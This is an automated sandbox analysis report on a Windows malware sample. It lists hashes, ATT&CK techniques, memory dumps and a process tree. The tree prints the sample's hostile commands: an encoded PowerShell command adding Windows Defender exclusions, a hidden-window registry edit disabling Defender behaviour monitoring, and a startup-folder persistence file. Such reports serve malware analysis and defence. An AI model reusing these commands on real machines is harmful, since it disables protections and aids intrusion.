666d91620d589b16b55f847c0c84396419461844d9ab844ad39a7df9d88c34e5

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
13-12-2024 16:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9fa71bd01a54e0726de72e272bcbe6eb.exe
Size

1.3MB
MD5

9fa71bd01a54e0726de72e272bcbe6eb
SHA1

03822545415f9dc69207495898c706c0d8340807
SHA256

666d91620d589b16b55f847c0c84396419461844d9ab844ad39a7df9d88c34e5
SHA512

32eaa6c191f077de67251af4057ee9fee6d9ea69d58ce6d6a1c6f5623ba26013152ae614d1465939f44ad9e2125caed786fa4abc821082845037a9ab1d2a27af
SSDEEP

24576:x0kpqP4E3+rAOymAfu86lJ5qKYv8aIlbRnxYUsNV/qXOlY/nZZMR:kwKcATbG8TKrOlNxqXTvMR

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1596	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs	9fa71bd01a54e0726de72e272bcbe6eb.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1352	2100	WerFault.exe	29

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9fa71bd01a54e0726de72e272bcbe6eb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5952	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
6140	powershell.exe
2100	9fa71bd01a54e0726de72e272bcbe6eb.exe
2100	9fa71bd01a54e0726de72e272bcbe6eb.exe
1596	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe
Token: SeDebugPrivilege	6140	powershell.exe
Token: SeDebugPrivilege	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe
Token: SeDebugPrivilege	1596	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2100 wrote to memory of 5928	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	30
PID 2100 wrote to memory of 5928	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	30
PID 2100 wrote to memory of 5928	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	30
PID 2100 wrote to memory of 5928	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	30
PID 5928 wrote to memory of 5952	5928	cmd.exe	32
PID 5928 wrote to memory of 5952	5928	cmd.exe	32
PID 5928 wrote to memory of 5952	5928	cmd.exe	32
PID 5928 wrote to memory of 5952	5928	cmd.exe	32
PID 2100 wrote to memory of 6140	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	34
PID 2100 wrote to memory of 6140	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	34
PID 2100 wrote to memory of 6140	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	34
PID 2100 wrote to memory of 6140	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	34
PID 2100 wrote to memory of 1596	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	36
PID 2100 wrote to memory of 1596	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	36
PID 2100 wrote to memory of 1596	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	36
PID 2100 wrote to memory of 1596	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	36
PID 2100 wrote to memory of 1352	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	38
PID 2100 wrote to memory of 1352	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	38
PID 2100 wrote to memory of 1352	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	38
PID 2100 wrote to memory of 1352	2100	9fa71bd01a54e0726de72e272bcbe6eb.exe	38

C:\Users\Admin\AppData\Local\Temp\9fa71bd01a54e0726de72e272bcbe6eb.exe
"C:\Users\Admin\AppData\Local\Temp\9fa71bd01a54e0726de72e272bcbe6eb.exe"
1⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2100
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ipconfig /release
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5928
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /release
    3⤵
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:5952
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOQBmAGEANwAxAGIAZAAwADEAYQA1ADQAZQAwADcAMgA2AGQAZQA3ADIAZQAyADcAMgBiAGMAYgBlADYAZQBiAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADkAZgBhADcAMQBiAGQAMAAxAGEANQA0AGUAMAA3ADIANgBkAGUANwAyAGUAMgA3ADIAYgBjAGIAZQA2AGUAYgAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXAB1AHAAZABhAHQAZQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAHUAcABkAGEAdABlAC4AZQB4AGUA
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6140
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" PowerShell.exe -NoProfile -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$registryPath = 'HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'; $data = '1'; reg add 'HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t 'REG_DWORD' /d "^""$data"^"" /f"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 588
  2⤵
  - Program crash
  PID:1352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EBNI7HFAHSIJ1Y0OZI0P.temp

Filesize
7KB

MD5
a2043b8e9cbbd7899b934fcfd0dd2efa

SHA1
6f0ea1bce0b5d67f2cd5600f1cb4ebf25b144fb2

SHA256
539439015ccad600490f20b21ba08f69837266fc564e9f053f4132d55187244e

SHA512
584f26ea83a1c8f4b045be72a775459c67500926a1d03c1563b25c68ee2a9eb647134e0d7e3a8fff7de4472b9aa1239b038b9828e41fa59a15cfbf940c39df98

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
1c5785008c0b871cf14c040ec68a3097

SHA1
45943501155fcc813084fab3afc698db493bb398

SHA256
6b06ba3dc8e59c1c6e7f29a6c25cae65bd83242a9483ca56b4332e1cc9a3a4c3

SHA512
6dbc82cd2afde26168d21b86585086b91276ae5789a850ab91a10ce70c2aa504f052a078477bade252c65187a68de8bdd98f3820f175cd7d9736f77ba96defc7

Download Submit
memory/2100-48-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-1-0x00000000003C0000-0x0000000000516000-memory.dmp

Filesize
1.3MB

Download
memory/2100-4-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-6-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-8-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-20-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-38-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-64-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-10-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-18-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-16-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-14-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-12-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-22-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-66-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-62-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-0-0x0000000074B9E000-0x0000000074B9F000-memory.dmp

Filesize
4KB

Download
memory/2100-58-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-56-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-54-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-52-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-50-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-44-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-3-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-60-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-42-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-40-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-36-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-34-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-32-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-30-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-28-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-26-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-24-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-1179-0x0000000005090000-0x00000000050FC000-memory.dmp

Filesize
432KB

Download
memory/2100-1180-0x0000000000910000-0x000000000095C000-memory.dmp

Filesize
304KB

Download
memory/2100-1182-0x0000000074B90000-0x000000007527E000-memory.dmp

Filesize
6.9MB

Download
memory/2100-1181-0x0000000074B90000-0x000000007527E000-memory.dmp

Filesize
6.9MB

Download
memory/2100-1183-0x0000000074B9E000-0x0000000074B9F000-memory.dmp

Filesize
4KB

Download
memory/2100-1184-0x0000000074B90000-0x000000007527E000-memory.dmp

Filesize
6.9MB

Download
memory/2100-1185-0x0000000074B90000-0x000000007527E000-memory.dmp

Filesize
6.9MB

Download
memory/2100-1186-0x0000000074B90000-0x000000007527E000-memory.dmp

Filesize
6.9MB

Download
memory/2100-1189-0x0000000004350000-0x00000000043A4000-memory.dmp

Filesize
336KB

Download
memory/2100-2-0x0000000004780000-0x000000000487C000-memory.dmp

Filesize
1008KB

Download
memory/2100-46-0x0000000004780000-0x0000000004877000-memory.dmp

Filesize
988KB

Download
memory/2100-1197-0x0000000074B90000-0x000000007527E000-memory.dmp

Filesize
6.9MB

Download